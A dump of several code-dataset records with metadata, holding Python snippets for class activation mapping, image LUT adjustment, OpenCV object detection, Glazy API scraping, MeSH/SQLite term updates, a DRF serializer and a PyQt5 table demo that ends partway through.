"sub_path": "ob/obj.py", "file_name": "obj.py", "file_ext": "py", "file_size_in_byte": 12600, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.path.join", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "uuid.uuid4", "line_number": 46, "usage_type": "call"}, {"api_name": "os.sep.join", "line_number": 47, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 47, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 47, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 47, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 158, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 158, "usage_type": "call"}, {"api_name": "os.path", "line_number": 158, "usage_type": "attribute"}, {"api_name": "os.sep.join", "line_number": 223, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 223, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 224, "usage_type": "call"}, {"api_name": "os.path", "line_number": 224, "usage_type": "attribute"}, {"api_name": "os.sep.join", "line_number": 224, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 224, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 224, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 224, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 226, "usage_type": "call"}, {"api_name": "os.path", "line_number": 226, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 228, "usage_type": "call"}, {"api_name": "sys.modules.get", "line_number": 282, "usage_type": "call"}, {"api_name": "sys.modules", "line_number": 282, "usage_type": "attribute"}, {"api_name": "sys.modules", "line_number": 300, "usage_type": "attribute"}, {"api_name": "types.ModuleType", "line_number": 309, "usage_type": "attribute"}, {"api_name": "os.sep", "line_number": 339, "usage_type": "attribute"}, {"api_name": "os.sep.join", "line_number": 340, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 340, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 350, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 357, "usage_type": "attribute"}, {"api_name": "os.sep", "line_number": 359, "usage_type": "attribute"}, {"api_name": "os.sep.join", "line_number": 360, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 360, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 361, "usage_type": "call"}, {"api_name": "os.path", "line_number": 361, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 362, "usage_type": "call"}, {"api_name": "os.path", "line_number": 362, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 364, "usage_type": "call"}, {"api_name": "os.sep.join", "line_number": 399, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 399, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 400, "usage_type": "call"}, {"api_name": "os.path", "line_number": 400, "usage_type": "attribute"}, {"api_name": "os.sep.join", "line_number": 400, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 400, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 400, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 400, "usage_type": 
"attribute"}, {"api_name": "os.path.join", "line_number": 401, "usage_type": "call"}, {"api_name": "os.path", "line_number": 401, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 404, "usage_type": "call"}, {"api_name": "os.chmod", "line_number": 405, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 436, "usage_type": "call"}, {"api_name": "os.path", "line_number": 436, "usage_type": "attribute"}, {"api_name": "os.sep", "line_number": 438, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 439, "usage_type": "call"}, {"api_name": "os.path", "line_number": 439, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 440, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 463, "usage_type": "attribute"}, {"api_name": "time.mktime", "line_number": 468, "usage_type": "call"}, {"api_name": "time.strptime", "line_number": 468, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 479, "usage_type": "call"}, {"api_name": "os.path", "line_number": 479, "usage_type": "attribute"}, {"api_name": "os.sep", "line_number": 479, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 482, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 486, "usage_type": "call"}, {"api_name": "os.path", "line_number": 486, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 487, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 489, "usage_type": "call"}, {"api_name": "os.path", "line_number": 489, "usage_type": "attribute"}, {"api_name": "os.sep", "line_number": 508, "usage_type": "attribute"}, {"api_name": "os.sep", "line_number": 509, "usage_type": "attribute"}, {"api_name": "os.sep", "line_number": 511, "usage_type": "attribute"}, {"api_name": "os.sep.join", "line_number": 513, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 513, "usage_type": "attribute"}, {"api_name": "sys.modules.get", "line_number": 515, "usage_type": "call"}, {"api_name": "sys.modules", "line_number": 515, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 527, "usage_type": "call"}, {"api_name": "os.path", "line_number": 527, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 528, "usage_type": "call"}, {"api_name": "os.path", "line_number": 528, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 530, "usage_type": "call"}]}
+{"seq_id": "633320797", "text": "import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nfrom PIL import Image\nfrom skimage import io\nfrom torchvision.transforms.functional import to_pil_image\n\n\nclass ClassActivationMapping:\n def __init__(\n self,\n model,\n image_path,\n transformation_pipeline,\n last_conv_layer=\"layer4\",\n device=\"cpu\",\n ):\n self.model = model\n\n self.grad_maps = []\n\n self.model._modules[last_conv_layer].register_forward_hook(self.__register_grad)\n self.weight_softmax = self.model.fc.weight.to(device)\n self.image = io.imread(image_path)\n self.__forward_img(transformation_pipeline, device)\n\n def __register_grad(self, module, input, output):\n self.grad_maps.append(output.data)\n return None\n\n def __forward_img(self, transformation_pipeline, device):\n image = transformation_pipeline(image=self.image)[\"image\"]\n image = torch.tensor(image.unsqueeze(0)).to(device)\n self.model.forward(image)\n\n def get_cam(self):\n cam = self.weight_softmax[1, :] @ torch.flatten(self.grad_maps[0], 2)\n cam = cam.view(\n self.grad_maps[0].size(0),\n 1,\n self.grad_maps[0].size(3),\n self.grad_maps[0].size(2),\n )\n cam = to_pil_image(cam[0, 0].detach().numpy())\n cam = cam - np.min(cam)\n cam = cam / np.max(cam)\n cam = Image.fromarray(np.uint8(255 * cam))\n cam = cam.resize(self.image.shape[0:2], resample=Image.BICUBIC)\n return cam\n\n def show_cam_on_image(self, cam):\n cam_color = cv2.applyColorMap(np.uint8(255 * np.array(cam)), cv2.COLORMAP_JET)\n img_cam = np.float32(cam_color) + np.float32(self.image)\n img_cam = img_cam / np.max(img_cam)\n plt.imshow(img_cam)\n plt.show()\n", "sub_path": "src/class_activation_mapping.py", "file_name": "class_activation_mapping.py", "file_ext": "py", "file_size_in_byte": 1838, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "skimage.io.imread", "line_number": 25, "usage_type": "call"}, {"api_name": "skimage.io", "line_number": 25, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.flatten", "line_number": 38, "usage_type": "call"}, {"api_name": "torchvision.transforms.functional.to_pil_image", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 47, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 48, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 48, "usage_type": "name"}, {"api_name": "numpy.uint8", "line_number": 48, "usage_type": "call"}, {"api_name": "PIL.Image.BICUBIC", "line_number": 49, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 49, "usage_type": "name"}, {"api_name": "cv2.applyColorMap", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 53, "usage_type": "call"}, {"api_name": "cv2.COLORMAP_JET", "line_number": 53, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}]}
+{"seq_id": "95090751", "text": "#!/usr/bin/python\nimport sys\n\nimport numpy as np\nfrom PIL import Image\n\nfrom utils import bound, im_to_arr\n\n\ndef lut_mainp(img, lut):\n w, h = img.shape\n flat = img.flatten()\n for x in range(len(flat)):\n flat[x] = lut[flat[x]]\n flat = flat.reshape((w, h))\n return flat\n\n\ndef main(args):\n img = im_to_arr(args[0])\n\n r_lut = bound(np.array(range(0, 256)) + 50)\n g_lut = bound(np.array(range(0, 256)) + 40)\n b_lut = bound(np.array(range(0, 256)) - 100)\n img[:, :, 0] = lut_mainp(img[:, :, 2], r_lut)\n img[:, :, 1] = lut_mainp(img[:, :, 2], g_lut)\n img[:, :, 2] = lut_mainp(img[:, :, 2], b_lut)\n\n img = Image.fromarray(img.astype(np.uint8))\n img.show()\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n", "sub_path": "Report2/R1codes/histogram_mainp.py", "file_name": "histogram_mainp.py", "file_ext": "py", "file_size_in_byte": 749, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "utils.im_to_arr", "line_number": 20, "usage_type": "call"}, {"api_name": "utils.bound", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 22, "usage_type": "call"}, {"api_name": "utils.bound", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 23, "usage_type": "call"}, {"api_name": "utils.bound", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 24, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 29, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 29, "usage_type": "name"}, {"api_name": "numpy.uint8", "line_number": 29, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 34, "usage_type": "attribute"}]}
+{"seq_id": "260803424", "text": "from math import floor\n\nimport cv2 as cv\nfrom flask import current_app\n\n\nGREEN = (0, 255, 0)\nBLACK = (0, 0, 0)\n\n\nclass ChexxTracker:\n def __init__(self, *args, **kwargs):\n self.net = cv.dnn.readNetFromTensorflow(\n str(current_app.config['DATA_MODEL_DIR'] / 'frozen_inference_graph.pb'),\n str(current_app.config['DATA_MODEL_DIR'] / 'graph.pbtxt')\n )\n self.threshold = 0.3\n\n def handle_frame(self, frame):\n rows, cols, channels = frame.shape\n self.net.setInput(cv.dnn.blobFromImage(frame, size=(300, 300), swapRB=True, crop=False))\n net_output = self.net.forward()\n\n for detection in net_output[0, 0]:\n score = float(detection[2])\n if score < self.threshold:\n continue\n\n bottom_box_left = int(detection[3] * cols)\n bottom_box_top = int(detection[4] * rows)\n bottom_box_right = int(detection[5] * cols)\n bottom_box_bottom = int(detection[6] * rows)\n\n box_offset = 25\n top_box_top = bottom_box_top + box_offset\n\n cv.rectangle(\n img=frame,\n pt1=(bottom_box_left, top_box_top),\n pt2=(bottom_box_right, bottom_box_top),\n color=GREEN,\n thickness=-1\n )\n cv.rectangle(\n img=frame,\n pt1=(bottom_box_left, bottom_box_top),\n pt2=(bottom_box_right, bottom_box_bottom),\n color=GREEN,\n thickness=2\n )\n cv.putText(\n img=frame,\n text=f'{round(score * 100)}%',\n org=(bottom_box_left, bottom_box_top + (floor(box_offset / 2))),\n fontFace=cv.FONT_HERSHEY_COMPLEX_SMALL,\n color=BLACK,\n fontScale=.9,\n lineType=1,\n thickness=1\n )\n\n return frame\n", "sub_path": "helpers.py", "file_name": "helpers.py", "file_ext": "py", "file_size_in_byte": 1945, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "cv2.dnn.readNetFromTensorflow", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.dnn", "line_number": 13, "usage_type": "attribute"}, {"api_name": "flask.current_app.config", "line_number": 14, "usage_type": "attribute"}, {"api_name": "flask.current_app", "line_number": 14, "usage_type": "name"}, {"api_name": "flask.current_app.config", "line_number": 15, "usage_type": "attribute"}, {"api_name": "flask.current_app", "line_number": 15, "usage_type": "name"}, {"api_name": "cv2.dnn.blobFromImage", "line_number": 21, "usage_type": "call"}, {"api_name": "cv2.dnn", "line_number": 21, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 44, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 51, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 54, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_COMPLEX_SMALL", "line_number": 55, "usage_type": "attribute"}]}
+{"seq_id": "293066151", "text": "\n# Hedieh Moradi- 2021- Hybrid Atelier\n# This program will go through a JSON files which contains list of API call links for glazy.org\n# This code will open each link from the file and extract the informaiton bellow\n# These data are formated to match my MongoDB schema, and you need to format it based on your needs.\n\n# Packages\nimport urllib.request as request\nimport json\n\n# Create a JSON file from the extracted data\ndef create_json(data_id):\n res ={}\n metadata_res={}\n chemistry_list= []\n properties_dic={}\n application_dic={}\n\n for chem in data_id['materialComponents']:\n material_temp={}\n material_temp['material']= chem['material']['name']\n material_temp['amount']= chem['percentageAmount']\n material_temp['unit']= 'gram'\n chemistry_list.append(material_temp)\n \n \n\n res['rfid']= None\n res['container']= None\n res['icon']= {}\n metadata_res['parent']= None\n metadata_res['children']= []\n metadata_res['class_name']= \"GlazeRFID\"\n metadata_res['name']= data_id['name']\n metadata_res[\"manufacturer\"]= data_id['createdByUser']['name']\n if data_id['description']:\n metadata_res[\"description\"]= data_id['description']\n else:\n metadata_res[\"description\"]= None\n metadata_res['url']= 'glazy.org/recipes/'+ str(data_id['id'])\n metadata_res['keys']=[]\n\n metadata_res['images']= data_id['selectedImage']['filename']\n properties_dic['firing']= data_id.get('toOrtonConeName', None)\n\n properties_dic[\"recipe\"]= chemistry_list\n properties_dic[\"total_amount\"]= data_id['materialComponentTotalAmount']\n\n application_dic[\"food_safe\"]= None\n application_dic[\"brushable\"]= None\n application_dic[\"dippable\"]= None\n application_dic[\"pourable\"]= None\n application_dic[\"sprayable\"]= None\n\n\n properties_dic['application']=application_dic\n metadata_res['properties']= properties_dic\n \n res['metadata'] = metadata_res\n return res\n\n# Open file containing API links and send request to each link \nwith open('YOUR_FIle_Local', 'r') as f:\n links= json.load(f)\n for link in links:\n with request.urlopen(link) as response:\n if response.getcode() == 200:\n source = response.read()\n data = json.loads(source)\n for entry in data['data']:\n result = create_json(entry)\n file_name= f'./glazy_glazes/glaze_{str(entry[\"id\"])}.json' #Save each JSON file using this method \"glaze_ID\"\n \n with open(file_name, 'w') as outfile:\n json.dump(result, outfile, indent=4)\n\n\n else:\n print('An error occurred while attempting to retrieve data from the API.')\n\n", "sub_path": "Step-2-glazy-to-epoch.py", "file_name": "Step-2-glazy-to-epoch.py", "file_ext": "py", "file_size_in_byte": 2765, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "json.load", "line_number": 64, "usage_type": "call"}, {"api_name": "urllib.request.urlopen", "line_number": 66, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 66, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 69, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 75, "usage_type": "call"}]}
+{"seq_id": "563103482", "text": "#!/usr/bin/python\nimport sys, os, time, sqlite3\n\ndef get_stimuli(DB):\n\n stime = time.time() #get starting time\n\n stimuli_list = [] # creat list of concepts\n \n DB = str(DB) # make DB name readable\n conn = sqlite3.connect(DB) # connect to existed DB or ceat a new one\n\n ### check connection with DB\n if conn.total_changes == 0:\n print (f\"\\nConnection with {DB} went ok\")\n else:\n print (f\"\\nconnection with {DB} didn't work\")\n sys.exit()\n\n \n c = conn.cursor() # make it able to execute commands\n\n rows = c.execute(\"SELECT * FROM stimuli\").fetchall() # get all lines in stimule table\n\n for r in rows: # get concept in each line\n concept = r[0]\n stimuli_list.append(concept)\n\n ### return a set of stimuli concepts\n etime = time.time() # get end time\n TIME = time.strftime(\"%H:%M:%S\", time.gmtime(etime-stime)) # set duration\n print (f'Stimuli list, done in {TIME}.')\n return set(stimuli_list)\n\ndef get_megaDict(DB):\n\n stime = time.time() #get starting time\n\n megadict_list = [] # creat list of terms\n \n DB = str(DB) # make DB name readable\n conn = sqlite3.connect(DB) # connect to existed DB or ceat a new one\n\n\n ### check connection with DB\n if conn.total_changes == 0:\n print (f\"\\nConnection with {DB} went ok\")\n else:\n print (f\"\\nconnection with {DB} didn't work\")\n sys.exit()\n \n c = conn.cursor() # make it able to execute commands\n\n rows = c.execute(\"SELECT * FROM mega_dictionary_taxonomy\").fetchall() # get all lines in stimule table\n\n for r in rows: # get terms in each line\n synonym = r[2]\n megadict_list.append(synonym)\n\n ### return a set of stimuli concepts\n etime = time.time() # get end time\n TIME = time.strftime(\"%H:%M:%S\", time.gmtime(etime-stime)) # set duration\n print (f'Megadict list, done in {TIME}.')\n return set(megadict_list)\n\n\ndef get_mesh(mesh_file):\n\n stime = time.time() #get starting time\n\n ### creat list of tuples and tup to be\n mesh_list = []\n\n with open(mesh_file, 'r') as fp: # read mesh_file lines - actually a XML file (tree format)\n\n for line in fp:\n line=line.strip()\n \n if not line or line.startswith(\"#\"): # ignore malformed or not interested line\n continue\n\n if line.startswith(\"\"): # find string line\n S1,L = line.split(\"\")\n L,S2 = L.split(\"\")\n mesh = L\n\n mesh_list.append(mesh) # append mesh term\n\n\n\n ### return a set of mesh concepts\n etime = time.time() # get end time\n TIME = time.strftime(\"%H:%M:%S\", time.gmtime(etime-stime)) # set duration\n print (f'\\n\\nMesh list, done in {TIME}.')\n return set(mesh_list)\n\n\n \n\n\n# Get rid of terms alread existent in stimuli table by comparing the two lists.\n# Get rid of terms that are represented in mega_dictionary \ndef make_list(DB,mesh_file):\n\n\n ### Get lists to use\n stimuli = get_stimuli(DB) # return list of stimuli concepts\n megadict = get_megaDict(DB) # return list os terms from megadict\n mesh = get_mesh(mesh_file) # return list of mesh concept \n \n\n ### make list tup and tup to be\n List_tup=[]\n tup=[]\n\n stime = time.time() #get starting time \n new_terms = (mesh|megadict) - megadict # new set without elemets from megadict\n new_set = (new_terms|stimuli) - stimuli # new set to be added, containing only new concepts\n\n for concept in new_set:\n tup.append(concept)\n tup.append('A0')\n tup=tuple(tup)\n List_tup.append(tup)\n tup=[]\n \n\n ### return a set of mesh concepts\n etime = time.time() # get end time\n TIME = time.strftime(\"%H:%M:%S\", time.gmtime(etime-stime)) # set 
duration\n print (f'\\n\\nList of tuple for stimuli update, done in {TIME}.')\n return List_tup\n\n\n\n\n \n########### get funtions to work ##########\n###########################################\n###########################################\n \n\n### Get variables \n#DB = sys.argv[1]\n#mesh_file = sys.argv[2]\n\n### list tup of stimuli\n#new_stimuli = make_list(DB,mesh_file)\n\n", "sub_path": "pipeline_laitor/util/UPDATE/stimuli_update.py", "file_name": "stimuli_update.py", "file_ext": "py", "file_size_in_byte": 4194, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "time.time", "line_number": 6, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 11, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 18, "usage_type": "call"}, {"api_name": "time.time", "line_number": 30, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 31, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 31, "usage_type": "call"}, {"api_name": "time.time", "line_number": 37, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 42, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 50, "usage_type": "call"}, {"api_name": "time.time", "line_number": 61, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 62, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 62, "usage_type": "call"}, {"api_name": "time.time", "line_number": 69, "usage_type": "call"}, {"api_name": "time.time", "line_number": 92, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 93, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 93, "usage_type": "call"}, {"api_name": "time.time", "line_number": 116, "usage_type": "call"}, {"api_name": "time.time", "line_number": 129, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 130, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 130, "usage_type": "call"}]}
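+# The two set expressions in make_list above simplify to plain set differences; a
+# short check with toy terms showing (mesh | megadict) - megadict == mesh - megadict.
+mesh = {"aspirin", "ibuprofen", "caffeine"}
+megadict = {"caffeine"}
+stimuli = {"aspirin"}
+new_terms = (mesh | megadict) - megadict    # == mesh - megadict
+new_set = (new_terms | stimuli) - stimuli   # == new_terms - stimuli
+print(sorted(new_set))                      # ['ibuprofen']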
+{"seq_id": "296315529", "text": "from rest_framework import serializers\n\nfrom main.serializers.fields import DateTimeField\nfrom payment.models import UserPayment, LocalPayment, PaymentLog, UserScriptDelegationAccess, \\\n UserOfflineScriptExportAccess\nfrom users.models import CustomUser\n\n\nclass ExportedScriptField(serializers.Field):\n def to_representation(self, offline_exported_script):\n if offline_exported_script.script_data and offline_exported_script.script and offline_exported_script.exported:\n return {\n 'id': offline_exported_script.script.id,\n 'name': offline_exported_script.script.name\n }\n\n def get_attribute(self, script):\n return script\n\n def to_internal_value(self, script):\n return script\n\n\nclass UserOfflineExportedScriptSerializer(serializers.ModelSerializer):\n date = DateTimeField(required=False, read_only=True)\n payed = DateTimeField(required=False, read_only=True)\n exported_date = DateTimeField(required=False, read_only=True)\n script = ExportedScriptField(required=False, read_only=True)\n\n class Meta:\n model = UserOfflineScriptExportAccess\n fields = ('id', 'user', 'payed', 'date', 'script', 'exported_date')\n", "sub_path": "offline/serializers.py", "file_name": "serializers.py", "file_ext": "py", "file_size_in_byte": 1217, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "rest_framework.serializers.Field", "line_number": 9, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 9, "usage_type": "name"}, {"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 24, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 24, "usage_type": "name"}, {"api_name": "main.serializers.fields.DateTimeField", "line_number": 25, "usage_type": "call"}, {"api_name": "main.serializers.fields.DateTimeField", "line_number": 26, "usage_type": "call"}, {"api_name": "main.serializers.fields.DateTimeField", "line_number": 27, "usage_type": "call"}, {"api_name": "payment.models.UserOfflineScriptExportAccess", "line_number": 31, "usage_type": "name"}]}
+{"seq_id": "296809283", "text": "import sys\n\nfrom PyQt5.QtWidgets import (QApplication, QMainWindow,\n QLabel,QTableWidgetItem,QAbstractItemView)\n\nfrom enum import Enum ##枚举类型\n\nfrom PyQt5.QtCore import pyqtSlot, Qt,QDate\n\nfrom PyQt5.QtGui import QFont, QBrush, QIcon\n\nfrom ui_MainWindow import Ui_MainWindow\n\nclass CellType(Enum): ##各单元格的类型\n ctName=1000\n ctSex =1001\n ctBirth =1002\n ctNation=1003\n ctScore=1004\n ctPartyM=1005\n\nclass FieldColNum(Enum): ##各字段在表格中的列号\n colName=0\n colSex=1\n colBirth=2\n colNation=3\n colScore=4\n colPartyM=5\n\nclass QmyMainWindow(QMainWindow): \n\n def __init__(self, parent=None):\n super().__init__(parent) #调用父类构造函数,创建窗体\n self.ui=Ui_MainWindow() #创建UI对象\n self.ui.setupUi(self) #构造UI界面\n## self.setWindowTitle(\"Demo3_10,QTableWidget的使用\")\n\n self.LabCellIndex=QLabel(\"当前单元格坐标:\",self)\n self.LabCellIndex.setMinimumWidth(250)\n self.LabCellType=QLabel(\"当前单元格类型:\",self)\n self.LabCellType.setMinimumWidth(200)\n self.LabStudID=QLabel(\"学生ID:\",self)\n self.LabStudID.setMinimumWidth(200)\n self.ui.statusBar.addWidget(self.LabCellIndex) #加到状态栏\n self.ui.statusBar.addWidget(self.LabCellType)\n self.ui.statusBar.addWidget(self.LabStudID)\n\n self.ui.tableInfo.setAlternatingRowColors(True) #交替行颜色\n self.__tableInitialized=False #表格数据未初始化\n\n\n## ==============自定义功能函数============\n def __createItemsARow(self,rowNo,name,sex,birth,nation,isParty,score): ##创建一行的items\n StudID=201805000+rowNo #学号\n\n #姓名\n item=QTableWidgetItem(name,CellType.ctName.value)\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n font=item.font()\n font.setBold(True)\n item.setFont(font)\n item.setData(Qt.UserRole,StudID) #关联数据\n self.ui.tableInfo.setItem(rowNo,FieldColNum.colName.value,item)\n\n #性别\n if (sex==\"男\"):\n icon=QIcon(\":/icons/images/boy.ico\")\n else:\n icon=QIcon(\":/icons/images/girl.ico\")\n item=QTableWidgetItem(sex,CellType.ctSex.value)\n item.setIcon(icon)\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n self.ui.tableInfo.setItem(rowNo,FieldColNum.colSex.value,item)\n\n #出生日期\n strBitrh=birth.toString(\"yyyy-MM-dd\") #日期转换为字符串\n item=QTableWidgetItem(strBitrh,CellType.ctBirth.value)\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n self.ui.tableInfo.setItem(rowNo,FieldColNum.colBirth.value,item)\n\n #民族\n item=QTableWidgetItem(nation,CellType.ctNation.value)\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n if (nation != \"汉族\"):\n item.setForeground(QBrush(Qt.blue)) \n self.ui.tableInfo.setItem(rowNo,FieldColNum.colNation.value,item)\n\n #分数\n strScore=str(score)\n item=QTableWidgetItem(strScore,CellType.ctScore.value)\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n self.ui.tableInfo.setItem(rowNo,FieldColNum.colScore.value,item)\n\n #党员\n item=QTableWidgetItem(\"党员\",CellType.ctPartyM.value)\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n if (isParty==True):\n item.setCheckState(Qt.Checked)\n else:\n item.setCheckState(Qt.Unchecked)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled | Qt.ItemIsUserCheckable) #不允许编辑文字\n item.setBackground(QBrush(Qt.yellow)) #Qt::green lightGray yellow\n self.ui.tableInfo.setItem(rowNo,FieldColNum.colPartyM.value,item) #为单元格设置Item\n \n \n## ==========由connectSlotsByName() 自动连接的槽函数================== \n @pyqtSlot() ##“设置表头”按钮\n def on_btnSetHeader_clicked(self): \n headerText=[\"姓 名\",\"性 别\",\"出生日期\",\"民 族\",\"分数\",\"是否党员\"] \n self.ui.tableInfo.setColumnCount(len(headerText)) #列数\n ## self.ui.tableInfo.setHorizontalHeaderLabels(headerText) 
#简单的表头文字,无格式\n \n for i in range(len(headerText)):\n headerItem=QTableWidgetItem(headerText[i])\n font=headerItem.font()\n ## font.setBold(True)\n font.setPointSize(11)\n headerItem.setFont(font)\n headerItem.setForeground(QBrush(Qt.red)) #前景色,即文字颜色\n self.ui.tableInfo.setHorizontalHeaderItem(i,headerItem)\n\n @pyqtSlot() ##设置行数\n def on_btnSetRows_clicked(self): \n self.ui.tableInfo.setRowCount(self.ui.spinRowCount.value()) #设置数据区行数\n self.ui.tableInfo.setAlternatingRowColors(self.ui.chkBoxRowColor.isChecked()) #设置交替行背景颜色\n \n\n @pyqtSlot() ##初始化表格数据\n def on_btnIniData_clicked(self): \n self.ui.tableInfo.clearContents() #清除表格内容\n\n birth=QDate(1998,6,23)\n isParty=True\n nation=\"汉族\"\n score=70\n \n rowCount=self.ui.tableInfo.rowCount() #表格行数\n for i in range(rowCount):\n strName=\"学生%d\"%i\n if ((i % 2)==0):\n strSex=\"男\"\n else:\n strSex=\"女\"\n self.__createItemsARow(i,strName,strSex,\n birth,nation,isParty,score)\n birth=birth.addDays(20)\n isParty=not isParty\n\n self.__tableInitialized=True #表格数据已初始化\n \n\n @pyqtSlot() ##插入行\n def on_btnInsertRow_clicked(self): \n curRow=self.ui.tableInfo.currentRow() #当前行号\n self.ui.tableInfo.insertRow(curRow)\n birth=QDate.fromString(\"1998-4-5\",\"yyyy-M-d\")\n self.__createItemsARow(curRow, \"新学生\", \"男\",birth,\"苗族\",True,65)\n \n @pyqtSlot() ##添加行\n def on_btnAppendRow_clicked(self): \n curRow=self.ui.tableInfo.rowCount() \n self.ui.tableInfo.insertRow(curRow)\n birth=QDate.fromString(\"1999-1-10\",\"yyyy-M-d\")\n self.__createItemsARow(curRow, \"新生\", \" 女\",birth,\"土家族\",False,86)\n \n @pyqtSlot() ##删除当前行\n def on_btnDelCurRow_clicked(self): \n curRow=self.ui.tableInfo.currentRow() #当前行号\n self.ui.tableInfo.removeRow(curRow)\n \n @pyqtSlot() ##清空表格内容\n def on_btnClearContents_clicked(self): \n self.ui.tableInfo.clearContents()\n\n @pyqtSlot() ##自动行高\n def on_btnAutoHeight_clicked(self): \n self.ui.tableInfo.resizeRowsToContents()\n \n @pyqtSlot() ##自动列宽\n def on_btnAutoWidth_clicked(self): \n 